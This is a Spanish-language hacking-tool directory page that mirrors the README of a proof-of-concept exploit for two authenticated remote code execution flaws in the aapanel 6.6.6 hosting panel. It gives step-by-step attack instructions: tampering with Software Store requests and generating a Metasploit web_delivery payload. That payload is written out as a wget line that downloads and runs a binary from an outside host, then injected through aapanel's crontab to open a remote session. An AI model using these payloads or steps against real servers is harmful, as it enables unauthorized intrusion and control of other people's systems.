Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
aapanel — aapanel 6.6.6 - (Authenticated) Remote Code Execution | Kitploit
Herramientas/GitHubGitHub/jenaye/aapanel
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - (Authenticated) Remote Code Execution

Ver Repositorio
27hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • Descripción : permite a usuarios autenticados remotos ejecutar comandos arbitrarios a través del menú de configuración de Software Store.
  • Versión afectada : Todas <= 6.6.6

Información

Para hacer este PoC, simplemente instalé el software usando docker-compose

  • Tipo de vulnerabilidad : Ejecución remota de comandos (RCE autenticado)

POC

Vaya a Software Store, haga clic en cualquier fila del campo de configuración, intercepte la solicitud cuando haga clic en "start/stop/restart" y modifique/edite la solicitud para ejecutar lo que quiera. Aquí tiene un ejemplo con curl:

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • Descripción : permite a un atacante ejecutar comandos arbitrarios de forma remota
  • Versión afectada : Todas <= 6.6.6

Información

Para hacer este PoC, instalé una Ubuntu 20.04 limpia, luego instalé wget + sudo y ejecuté este script wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

  • Tipo de vulnerabilidad : Ejecución remota de comandos (RCE autenticado)

POC

En primer lugar, configura las opciones de web_delivery; esto creará un payload y un listener.

web_delivery

Ahora ejecútalo

ejecutar

esto generará el siguiente payload:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Luego copia/pega esto en script content del menú crontab en aapanel.

cron

Ahora solo ejecuta tu crontab y espera tu sesión.

comando

Explotación rápida

Simplemente ejecuta msfconsole -r aapanel.rc, copia/pega el payload en la sección script content y disfruta de tu sesión.

Descargar herramienta